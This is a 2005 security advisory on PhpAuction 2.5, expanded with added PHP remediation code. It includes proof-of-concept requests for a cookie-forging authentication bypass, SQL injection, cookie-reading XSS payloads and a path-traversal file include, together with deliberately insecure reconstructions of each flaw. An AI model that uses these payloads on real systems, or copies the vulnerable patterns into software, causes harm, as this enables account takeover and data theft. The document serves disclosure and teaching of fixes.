PhpAuction suffers from authentication bypass, SQL injection, cross site scripting, and file inclusion vulnerabilities. Detailed exploitation provided.
--------------------------------------------------------------------------------
Dcrab's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies

******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO DCRAB@HACKERSCENTER.COM
******************************

Get Dcrab's Services to audit your Web servers, scripts, networks, etc., or even code them. Learn more at http://www.dbtech.org
Severity: High
Title: [Bday Release] PhpAuction has Authentication Bypass, Multiple SQL Injection, Cross Site Scripting and File Include vulnerabilities
Date: 8/07/2005
Vendor: PhpAuction
Vendor Website: http://www.phpauction.org
Vendor Status: Contacted but no reply
Summary: There are authentication bypass, multiple SQL injection, cross-site scripting and file include vulnerabilities in PhpAuction.
Proof of Concept Exploits:

Authentication bypass
Set the cookie as follows:
Name: PHPAUCTION_RM_ID
Value: the id number of the user/admin you want to impersonate (you can get it from their profile)
Access the website, and you're instantly logged in as them ;)
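The defect behind this bypass is that the application treats whatever user id the PHPAUCTION_RM_ID cookie carries as an authenticated identity, with nothing binding that value to a completed login. The following is an added example, not PhpAuction's code: it reconstructs that pattern as a hypothetical snippet and puts a hardened alternative beside it, in which identity is held only in the server-side session and any remember-me cookie carries an HMAC that the server verifies. The users table and its columns, the function names, the PHPAUCTION_RM_TOKEN cookie name and the REMEMBER_ME_SECRET constant are all assumptions.

```php
<?php
// Added example, not PhpAuction code. Reconstructs the flaw the advisory
// describes (identity read verbatim from the PHPAUCTION_RM_ID cookie) as a
// hypothetical snippet and shows a safe replacement. Table/column names,
// function names, the token cookie name and the secret are assumptions.

// --- Vulnerable pattern (hypothetical reconstruction) ---------------------
// Whoever controls the cookie decides which account they are logged in as;
// nothing ties the value to a password check that actually happened.
function current_user_id_insecure(): ?int
{
    return isset($_COOKIE['PHPAUCTION_RM_ID'])
        ? (int) $_COOKIE['PHPAUCTION_RM_ID']
        : null;
}

// --- Hardened: identity lives in the server-side session ------------------
// The browser only ever holds an opaque session id.
if (session_status() === PHP_SESSION_NONE) {
    session_start();
}

// Only a verified password puts a user id into the session.
function login(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return false;
    }
    session_regenerate_id(true);             // fresh session id on privilege change
    $_SESSION['user_id'] = (int) $row['id'];
    return true;
}

function current_user_id(): ?int
{
    return isset($_SESSION['user_id']) ? (int) $_SESSION['user_id'] : null;
}

// --- Hardened "remember me" cookie, if one is needed at all ----------------
// The cookie carries "<id>|<expiry>|<hmac>". Changing the id without the
// server secret invalidates the tag, so swapping in another user's id fails.
const REMEMBER_ME_SECRET = 'PLACEHOLDER-load-32-random-bytes-from-config'; // assumption

function issue_remember_me(int $userId, int $ttlSeconds = 1209600): void
{
    $expires = time() + $ttlSeconds;
    $payload = $userId . '|' . $expires;
    $tag     = hash_hmac('sha256', $payload, REMEMBER_ME_SECRET);
    setcookie('PHPAUCTION_RM_TOKEN', $payload . '|' . $tag, [
        'expires'  => $expires,
        'path'     => '/',
        'secure'   => true,      // only sent over HTTPS
        'httponly' => true,      // not readable by script (see the XSS findings)
        'samesite' => 'Lax',
    ]);
}

function verify_remember_me(string $cookie): ?int
{
    $parts = explode('|', $cookie);
    if (count($parts) !== 3) {
        return null;
    }
    [$userId, $expires, $tag] = $parts;
    if (!ctype_digit($userId) || !ctype_digit($expires) || (int) $expires < time()) {
        return null;
    }
    $expected = hash_hmac('sha256', $userId . '|' . $expires, REMEMBER_ME_SECRET);
    // hash_equals() compares in constant time, so the tag cannot be recovered
    // byte by byte from timing differences.
    return hash_equals($expected, $tag) ? (int) $userId : null;
}

// Request handling: the session wins; the signed cookie is only a fallback
// and is promoted into a fresh session once it verifies.
function resolve_user(): ?int
{
    $id = current_user_id();
    if ($id === null && isset($_COOKIE['PHPAUCTION_RM_TOKEN'])) {
        $id = verify_remember_me((string) $_COOKIE['PHPAUCTION_RM_TOKEN']);
        if ($id !== null) {
            session_regenerate_id(true);
            $_SESSION['user_id'] = $id;
        }
    }
    return $id;
}
```

The array form of setcookie() used here needs PHP 7.3 or later; on older releases the same flags are passed positionally. The secret must come from configuration outside the web root, and rotating it logs every remembered browser out, which is the desired effect after a compromise.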
SQL injection
/phpauction-gpl-2.5/adsearch.php?title=1&desc=on&closed=on&category='SQL_INJECTION&minprice=1&maxprice=1&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on&seller=1&country=Afghanistan&ending=1&SortProperty=ends&type=2&action=search&go=GO%20%3E%3E
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/adsearch.php on line 33

/viewnews.php?id='SQL_INJECTION
Error: select * from PROSITE_news where id=\'SQL_INJECTION
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL_INJECTION' at line 1
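Both SQL injection proofs show a request parameter reaching the query text unchanged. The viewnews.php error is instructive: the quote arrives already escaped as `\'`, yet it sits unquoted in `where id=`, so the value was concatenated into a numeric comparison where quote escaping protects nothing. As an added example, not PhpAuction's code, here is a hypothetical reconstruction of that pattern next to a hardened version built on PDO prepared statements, including a dynamic search filter for the category and payment[] parameters from the adsearch.php URL in which every user value is a placeholder. PROSITE_news is the table named in the advisory's error output; the auctions table, its columns and the PDO connection are assumptions.

```php
<?php
// Added example, not PhpAuction code. "PROSITE_news" comes from the error
// shown in the advisory; the auctions table, its columns and the PDO handle
// are assumptions.

// --- Vulnerable pattern (hypothetical reconstruction) ---------------------
// The raw parameter is glued into a numeric comparison. Escaping quotes does
// nothing here: the value was never inside quotes to begin with.
function view_news_insecure(mysqli $db, string $id)
{
    return $db->query('select * from PROSITE_news where id=' . $id);
}

// --- Hardened: validate the shape, then bind -------------------------------
function view_news(PDO $db, string $id): ?array
{
    if (!ctype_digit($id)) {                 // an id is digits or it is nothing
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM PROSITE_news WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- Hardened search with a dynamic WHERE clause ---------------------------
// Every user value, including each payment[] element, becomes a placeholder,
// so the SQL text never contains request data. The sort column comes from an
// allow-list because identifiers cannot be bound.
function ad_search(PDO $db, array $q): array
{
    $where  = [];
    $params = [];

    if (empty($q['closed'])) {               // "closed=on" means include closed ads
        $where[] = 'a.closed = 0';
    }
    if (is_string($q['category'] ?? null) && $q['category'] !== '') {
        $where[]             = 'a.category = :category';
        $params[':category'] = $q['category'];
    }
    foreach (['minprice' => '>=', 'maxprice' => '<='] as $key => $op) {
        if (isset($q[$key]) && is_numeric($q[$key])) {
            $where[]         = "a.price $op :$key";
            $params[":$key"] = (float) $q[$key];
        }
    }
    if (!empty($q['payment']) && is_array($q['payment'])) {
        $ph = [];
        foreach (array_values($q['payment']) as $i => $method) {
            if (!is_scalar($method)) {
                continue;                    // nested arrays are not payment methods
            }
            $ph[]             = ":pay$i";
            $params[":pay$i"] = (string) $method;
        }
        if ($ph) {
            $where[] = 'a.payment IN (' . implode(', ', $ph) . ')';
        }
    }

    $sortable = ['ends' => 'a.ends', 'price' => 'a.price', 'title' => 'a.title'];
    $sort     = $q['SortProperty'] ?? 'ends';
    $orderBy  = is_string($sort) && isset($sortable[$sort]) ? $sortable[$sort] : 'a.ends';

    $sql = 'SELECT a.* FROM auctions a'
         . ($where ? ' WHERE ' . implode(' AND ', $where) : '')
         . " ORDER BY $orderBy";
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage (connection details are placeholders):
// $db = new PDO('mysql:host=localhost;dbname=phpauction;charset=utf8mb4', 'user', 'pass',
//               [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
//                PDO::ATTR_EMULATE_PREPARES => false]);
// $rows = ad_search($db, $_GET);
```

With PDO::ATTR_EMULATE_PREPARES turned off the statement and its parameters travel to MySQL separately, so the server never parses user data as SQL. Disabling the verbose "Error: select * from ..." output shown in the advisory is a separate but worthwhile change: the echoed query text is what tells a tester exactly where the parameter lands.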
Cross Site Scripting
/phpauction-gpl-2.5/index.php?lan=<script>alert(document.cookie)</script>
/phpauction-gpl-2.5/profile.php?user_id=158&auction_id=<script>alert(document.cookie)</script>
/phpauction-gpl-2.5/profile.php?auction_id=<script>alert(document.cookie)</script>&id=159
/phpauction-gpl-2.5/admin/index.php?lan=<script>alert(document.cookie)</script>
/login.php?username=<script>alert(document.cookie)</script>
/viewnews.php?id=<script>alert(document.cookie)</script>
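Every cross-site scripting proof above is the same defect: a request parameter (lan, auction_id, id, username) is written back into the HTML response without encoding. As an added example, not PhpAuction's code, here is a small output-encoding helper together with hardened renderings of two of the reflections the advisory shows, the login form's username field and a profile link carrying user_id and auction_id, with the encoding chosen per context (HTML attribute versus URL query). The parameter names come from the URLs above; the page markup, function names and headers are assumptions.

```php
<?php
// Added example, not PhpAuction code. Parameter names (username, user_id,
// auction_id) come from the advisory's URLs; everything else is assumed.

// HTML text and attribute context: encode <, >, &, " and '.
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying the output.
function esc_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Query-string context: values going into an href are URL-encoded first,
// and the finished attribute value is still HTML-encoded.
function esc_query(array $params): string
{
    return esc_html(http_build_query($params, '', '&', PHP_QUERY_RFC3986));
}

// --- Vulnerable pattern (hypothetical reconstruction) ---------------------
// A quote in $username closes the attribute and the rest is parsed as markup.
function login_form_insecure(string $username): string
{
    return '<input name="username" value="' . $username . '">';
}

// --- Hardened login form: the username is reflected, but only as data ------
function login_form(string $username): string
{
    return '<form method="post" action="login.php">'
         . '<input name="username" value="' . esc_html($username) . '">'
         . '<input name="password" type="password">'
         . '<input type="submit" value="Login">'
         . '</form>';
}

// --- Hardened profile link: numeric ids are validated before use, and the
// query string is both URL- and HTML-encoded. A bad value is never echoed.
function profile_link(string $userId, string $auctionId): string
{
    if (!ctype_digit($userId) || !ctype_digit($auctionId)) {
        return '<p>Invalid profile request.</p>';
    }
    $href = 'profile.php?' . esc_query(['user_id' => $userId, 'auction_id' => $auctionId]);
    return '<a href="' . $href . '">View auction ' . esc_html($auctionId) . '</a>';
}

// Defence in depth for every response: an HttpOnly session cookie keeps
// document.cookie (the payload in each proof above) from reading it, and a
// restrictive CSP blocks inline script if an encoding slip remains. Call this
// before session_start() and before any output.
function send_security_headers(): void
{
    ini_set('session.cookie_httponly', '1');
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");
    header('X-Content-Type-Options: nosniff');
}

// send_security_headers();
// echo login_form((string) ($_GET['username'] ?? ''));
// echo profile_link((string) ($_GET['user_id'] ?? ''), (string) ($_GET['auction_id'] ?? ''));
```

The lan parameter is deliberately absent here: a language selector should be validated against an allow-list of installed language codes and never echoed as free text, which also closes the file include path below.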
File Include
/phpauction-gpl-2.5/index.php?lan=../put/.inc.php/file/name/here
Warning: main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php): failed to open stream: No such file or directory in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
Fatal error: main(): Failed opening required '/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php' (include_path='.:/usr/local/lib/php') in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34

/phpauction-gpl-2.5/admin/index.php?lan=../put/.inc.php/file/name/here
Warning: main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php): failed to open stream: No such file or directory in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
Fatal error: main(): Failed opening required '/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php' (include_path='.:/usr/local/lib/php') in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
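The warning text reveals how lan is consumed: it is spliced into the name of the message file, includes/messages.<lan>.inc.php, and the include follows whatever path the request supplies, so ../ walks out of the includes directory. As an added example, not PhpAuction's code, this is a hypothetical reconstruction of that include next to a hardened language loader that accepts only codes matching a strict pattern and actually installed on disk, falls back to a default otherwise, and checks that the resolved file still lives under the includes directory. The file naming scheme is taken from the warning; the default language, constants and function names are assumptions.

```php
<?php
// Added example, not PhpAuction code. The naming scheme
// includes/messages.<lan>.inc.php is read from the warning in the advisory;
// the constants, default language and function names are assumptions.

define('INCLUDES_DIR', __DIR__ . '/includes');
define('DEFAULT_LANG', 'en');

// --- Vulnerable pattern (hypothetical reconstruction) ---------------------
// The request parameter becomes part of the path, so "../" walks out of the
// includes directory, which is exactly what the advisory's warning shows.
function load_messages_insecure(string $lan): void
{
    require INCLUDES_DIR . '/messages.' . $lan . '.inc.php';
}

// --- Hardened: allow-list derived from the files that actually exist -------
// Returns the language codes for which a messages file is installed, e.g.
// "en" or "pt_BR". Anything that does not fit the pattern is ignored.
function available_languages(): array
{
    $codes = [];
    foreach (glob(INCLUDES_DIR . '/messages.*.inc.php') ?: [] as $file) {
        if (preg_match('/^messages\.([a-z]{2}(?:_[A-Z]{2})?)\.inc\.php$/', basename($file), $m)) {
            $codes[] = $m[1];
        }
    }
    return $codes;
}

// Picks a safe language code: strict shape, present in the allow-list,
// otherwise the default. Only an allow-listed literal reaches the path.
function select_language(?string $requested): string
{
    if ($requested === null || !preg_match('/^[a-z]{2}(?:_[A-Z]{2})?$/', $requested)) {
        return DEFAULT_LANG;
    }
    return in_array($requested, available_languages(), true) ? $requested : DEFAULT_LANG;
}

function load_messages(string $lan): void
{
    $path = INCLUDES_DIR . '/messages.' . select_language($lan) . '.inc.php';
    // Belt and braces: the resolved file must still sit inside INCLUDES_DIR.
    $real = realpath($path);
    $base = realpath(INCLUDES_DIR);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('message file outside includes directory');
    }
    require $real;
}

// load_messages((string) ($_GET['lan'] ?? DEFAULT_LANG));
```

Two php.ini settings limit the damage if a similar include survives elsewhere: open_basedir confines file access to the application tree, and allow_url_include = Off keeps an include from fetching remote code. Turning display_errors off in production also removes the path disclosure visible in the warnings above.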
Keep yourself updated; RSS feed at http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com. Please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://www.dbtech.org/. Look out for my soon-to-come-out book on secure coding with PHP.

Sincerely,
Diabolic Crab